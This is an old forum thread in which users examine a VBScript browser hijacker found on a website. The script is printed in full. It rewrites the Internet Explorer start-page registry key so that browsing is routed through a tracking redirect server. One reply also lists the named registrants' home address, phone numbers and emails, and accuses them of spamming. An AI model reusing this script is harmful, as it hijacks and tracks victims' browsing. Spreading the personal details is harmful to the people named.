Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

help with non virus thingy

  • 27-11-2001 2:21pm
    #1
    Closed Accounts Posts: 8,478 ✭✭✭


    ok i was browsing net when this happened :

    1) download box opens
    2) file name : THE-CID
    3) so i save it to disk [i know i shouldnt have but its been popping up b4]
    4) open file with wordpad, actual filename now is test.vbs [vbs normally = VIRUS]
    5) this is what i saw
    on error resume next

    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    Filter1 = "about:blank"
    Filter2 = "file:"
    Filter3 = "C:"
    Filter4 = "http://www.startyourdayhere.com"
    Filter5 = "http://redirect.linksummary.com"
    OUD = regedit.RegRead(regkey)
    URL = "http://str.realredirect.com/default.asp?a="
    if Left(OUD, Len(URL)) <> URL AND Left(OUD, Len(Filter1)) <> Filter1 AND Left(OUD, Len(Filter3)) <> Filter3 AND Left(OUD, Len(Filter2)) <> Filter2 AND Left(OUD, Len(Filter4)) <> Filter4 AND Left(OUD, Len(Filter5)) <> Filter5 then
    regedit.RegWrite regkey,regvalue+OUD
    end if
    end sub


    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://redirect.linksummary.com/redirect.asp?a=&quot;

    obviously it changes the startpage of explorer to waterver. i sent an email to the admin of linksummary complaining about it. my question is how is it tagged onto a site and how did it initiate ?

    anybody else get this ?


Comments

  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    OK, I've never done VB, but no doubt '.vbs' stands for Visual Basic Script. It looks like it's trying to log a permanent redirect if that page comes up with errors, but not knowing VB I couldn't know. Maybe the website people themselves put it there :)


  • Registered Users, Registered Users 2 Posts: 2,494 ✭✭✭kayos


    Right so from my quick reading of this script whats happening is as follows.

    Step 1:
    Something calls this function passing it a regkey and a value for that regkey
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://redirect.linksummary.com/redirect.asp?a=" 
    
    being what calls it.

    Step 2:
    The function reads your current value for the rgekey into the var OUD.

    Step 3:
    It compares the Var OUD to the Var URL. OUD is different to any of the following URL, Filter1, Filter2, Filter3, Filter4 or Filter5 it writes the follow string to your reg
    [url]http://redirect.linksummary.com/redirect.asp?a=[/url]<what ever your default home page is>
    
    so fi your hoime page was http://www.boards.ie it would write
    [url]http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie[/url]
    

    What site did this script come from? I'll see whats happening when you post the site up.

    kayos


  • Registered Users, Registered Users 2 Posts: 21,264 ✭✭✭✭Hobbes


    Originally posted by Gone Shootin
    obviously it changes the startpage of explorer to waterver.

    Actually it's a little nastier then that. It causes your page requests to be routed through thier server so if you were to look at http://www.boards.ie/ instead you would get http://redirect.linksummary.com/redirect.asp?a=http://www.boards.ie/

    So everything would be cached on thier server. Not sure if it would grab passwords or whatnot but it would give them a list of pages you access.

    Something like this would probably be used to slap an advert or two at you but I just checked the link and it just serves up the page so my guess is they are using it to track and store information on you. *sigh* better change my password =/

    That code looks very buggy though.


  • Closed Accounts Posts: 285 ✭✭marauder


    that explains the name.....

    Records of the Office of War Information
    The Central Intelligence Division, among its other functions, was to maintain a central repository of intelligence material and a central repository for all foreign operational information in Washington


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    now this i dont understand. i checked my homepage, the one i actually made [and still making]

    http://www.mitchelstown.net

    checked it today and got the download window with THE-CID.

    check it out, but dont open it ;)


    i presume im gona have to wipe the server or something, or maybe its coming through the domain service

    http://www.namesecure.com

    here is the reply to the email i sent to linksummery admin :

    "dear mr rea, this sounds very serious, please give us the url that you found this file at" etc....


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 21,264 ✭✭✭✭Hobbes


    Registrant:
    Ismailova, Elmira (LINKSUMMARY-DOM)
    Distelvlinderweg 88
    Diemen, - 1113 LB
    NL

    Domain Name: LINKSUMMARY.COM

    Administrative Contact, Technical Contact, Billing Contact:
    Ismailova, Elmira (RWHDCPZTCI) elmira@elmira-fashion.com
    Distelvlinderweg 88
    Diemen, - 1113 LB
    NL
    +31 6 53216321 +31 20 5241313

    That is in Holland btw.

    Now either the admin of linksummary is in on it, or thier server is hacked.

    Elmira also runs (or part of) realtracker.com which is a homepage usage tracker.

    She can also be contacted at a.de.raaf@universal.nl which appears to be an address also used by a "Gert-Jan Strik" who appears among other things to be a VB expert.

    Realtracker.com have been known to spam people and newsgroups. Thier sites are clickthough links which give the guy cash when people click the link .

    Owners of realtracker.com other contact information...

    john@pagetostart.com
    beheer@cybercomm.nl
    postmaster@pagetostart.nl
    postmaster@worldtostart.com
    adult_beheer@hotmail.com
    arjan@PAGETOSTART.COM (owner)
    postmaster@mediahighway.nl (owner)
    arjan@realtracker.com (owner)
    beheer@pins.nl

    I have found more information but from a guess of what I have read so far they are spammers, lord knows what they are up to with that file though.


  • Registered Users, Registered Users 2 Posts: 16,414 ✭✭✭✭Trojan


    Hey Hobbes, check your PM.

    Al.


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    and of course i use realtracker for ALL of my sites, god dammit i dont feel like going thru em and deleting em off the pages, specially with some of the sites having LOADSA hits...

    thanks hobbes


  • Closed Accounts Posts: 8,478 ✭✭✭GoneShootin


    update....

    this is what i got in my email this morning :
    I did check your website and I didn't get what you did get but I do know
    that one of our ex-workers did damage a view of our systems after we fired
    him, could you please check if you still got the problem subscribed below?

    Arjan de Raaf
    LinkSummary

    now the file is actually gone, which is fine, but i suspect that it was there when he took a look at it and THEN he fixed it....

    lol, AFTER WE FIRED HIM, funny....


Advertisement